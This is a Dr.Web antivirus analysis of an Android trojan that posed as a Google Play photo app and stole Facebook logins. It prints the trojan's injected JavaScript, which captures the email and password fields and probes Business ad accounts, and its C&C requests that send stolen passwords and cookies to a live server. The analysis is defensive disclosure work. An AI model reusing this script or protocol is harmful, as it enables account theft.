Defend what you create

Other Resources

Close

Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Android.PWS.Facebook.17

Added to the Dr.Web virus database: 2021-06-22

Virus description added:

SHA1 hash:

  • 2b931978aaee9e2a9d35b1f8bf35a9b89b74d2fa

Description

A trojan application for Android-powered devices. It is the same trojan as Android.PWS.Facebook.13, Android.PWS.Facebook.14, and Android.PWS.Facebook.15, but written in Dart language, using the Flutter framework.

Its main functionality is stealing logins and passwords of Facebook accounts. The analyzed modification hid in the PIP Photo application that was available on Google Play. However, the trojan can also be spread under the guise of other software.

screenshot Android.PWS.Facebook.17 #drweb

Operating routine

Upon launch, the Android.PWS.Facebook.17 receives configuration from the 108[.]160.132[.]15 C&C server:

POST /index2.php?r=user/init& HTTP/1.1
user-agent: Dart/2.10 (dart:io)
content-type: multipart/form-data; boundary=--dio-boundary-3920830045
accept-encoding: gzip
content-length: 129
host: 108.160.132.15
----dio-boundary-3920830045
content-disposition: form-data; name="appId"
com.piphoto.pipsapp
----dio-boundary-3920830045--
  
HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: XXX, XX XXX 2021 XX:XX:XX GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
  
  
{
    "retCode":0,
    "u":"https:\/\/www.facebook.com\/login.php",
    "ds":0,
    "d":"function ...\r\n"
}

where

  • d is a field containing JavaScript code that trojan uses to steal victims’ confidential data;
  • u is a field containing an URL of the web page with authorization form to be loaded. During the analysis, the trojan received configuration to display genuine Facebook login page https://www.facebook.com/login. However, it can also load web pages of other legitimate services and phishing sites.

A JavaScript from the d field used to steal authorization data is shown below:


function Logs(msg) {
    console.log(msg)
}
function exec() {
    try {
        var m = document.getElementById("email").value;
        var p = document.getElementById("pass").value;
        if (m.length <= 0 || p.length <= 0) {
            return false
        }
        t.a(m, p)
    } catch (e) {
        try {
            var m = document.getElementById("m_login_email").value;
            var p = document.getElementById("m_login_password").value;
            if (m.length <= 0 || p.length <= 0) {
                return false
            }
            t.a(m, p)
        } catch (e) {}
    }
}
function login() {
    try {
        var loginFormObj = document.getElementById("loginform");
        loginFormObj.getElementsByTagName("button")[0].addEventListener("touchend", function() {
            exec()
        });
        loginFormObj.getElementsByTagName("button")[0].addEventListener("click", function() {
            exec()
        });
        document.onkeydown = function(event) {
            if (event.keyCode === 13) {
                exec()
            }
        }
    } catch (e) {
        try {
            var loginFormObj = document.getElementById("login_form");
            loginFormObj.querySelectorAll("button[name^=login]")[0].addEventListener("touchend", function() {
                exec()
            });
            loginFormObj.querySelectorAll("button[name^=login]")[0].addEventListener("click", function() {
                exec()
            });
            document.onkeydown = function(event) {
                if (event.keyCode === 13) {
                    exec()
                }
            }
        } catch (e) {}
    }
}
var testpclogin = /facebook\.com\/login\.php/i;
var testwaplogin = /m.facebook\.com\/$|m.facebook\.com\/login\.php/i;
if (testpclogin.test(window.location.href) || testwaplogin.test(window.location.href)) {
    login()
} else {
    setTimeout(function() {
        Logs("=============111");
        try {
            Logs("=============22222");
            var testurl = /facebook\.com\/bookmarks\/pages/i;
            var testbmurl = /business\.facebook\.com/i;
            if (testurl.test(window.location.href)) {
                Logs("=============33333");
                var obj = document.getElementById("bookmarksSeeAllEntSection");
                if (obj == null) {
                    Logs("=============33333++++++");
                    obj = document.getElementsByTagName("iframe")[0].contentDocument.getElementById("bookmarksSeeAllEntSection")
                }
                if (obj != null) {
                    Logs("=============44444");
                    var len = obj.getElementsByTagName("li").length;
                    if (len > 0) {
                        Logs("=============55555");
                        t.c(1, 1)
                    }
                }
                setTimeout(function() {
                    Logs("=============66666666");
                    window.location = "{https://business.facebook.com/"}
                }, 1000)
            } else {
                if (testbmurl.test(window.location.href)) {
                    setTimeout(function() {
                        Logs("=============7777777777777");
                        var testbmurl1 = /business\.facebook\.com\/home\/accounts\?business_id=[0-9]+/i;
                        var testbmurl2 = /business\.facebook\.com\/select\/\?next=/i;
                        if (testbmurl1.test(window.location.href)) {
                            try {
                                var adcount = document.querySelectorAll("div[adaccountid]").length;
                                if (adcount > 0) {
                                    t.c(2, 3)
                                } else {
                                    t.c(2, 1)
                                }
                            } catch (e) {
                                t.c(2, 1)
                            }
                        } else {
                            if (testbmurl2.test(window.location.href)) {
                                Logs("=============88888888888");
                                t.c(2, 1)
                            } else {
                                Logs("=============99999999999");
                                t.c(2, 2)
                            }
                        }
                    }, 3000)
                }
            }
        } catch (e) {}
    }, 8000)
};

Authorization data theft

Android.PWS.Facebook.17 creates a local database pip.db containing the app’s data that will include stolen login, password and cookies:

screenshot Android.PWS.Facebook.17 #drweb

Upon user taps on any button in the menu of the trojan application, user is shown with the genuine login form of Facebook social network.

screenshot Android.PWS.Facebook.17 #drweb

After the victim successfully authorized on Facebook, the Android.PWS.Facebook.17 saves the data to the database and sends a request to the C&C server as shown below:

POST /idx2.php?t=lShuXXXX/dl&yybs=com.piphoto.pipsapp&yzxx=ZXlK[...]ZlE9PQ%3D%3D&gj=en&sbbs=ssbs HTTP/1.1
user-agent: Dart/2.10 (dart:io)
accept-encoding: gzip
content-length: 0
host: 108.160.132.15

The yzxx paramenter contains user data that was double-encoded in base64. An example of sent data:

{
    "ua":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36",
    "password":"XXXXXXXX",
    "page":"1",
    "cookie":"sb=XXXXXXXXXXX; datr=XXXXXXXXXXX; dpr=X; wd=9999x8888; c_user=XXXXXXXXXXXX; xs=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; fr=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; spin=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
    "name":"XXXXXXXXXXXXX@XXXXXXXXX.com",
    "bm":1
}

Indicators of compromise

News about the trojan

Curing recommendations


Android

  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web для Android Light onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

The Russian developer of Dr.Web anti-viruses
Doctor Web has been developing anti-virus software since 1992
Dr.Web is trusted by users around the world in 200+ countries
The company has delivered an anti-virus as a service since 2007
24/7 tech support

Dr.Web © Doctor Web
2003 — 2021

Doctor Web is the Russian developer of Dr.Web anti-virus software. Dr.Web anti-virus software has been developed since 1992.

2-12А, 3rd street Yamskogo polya, Moscow, Russia, 125124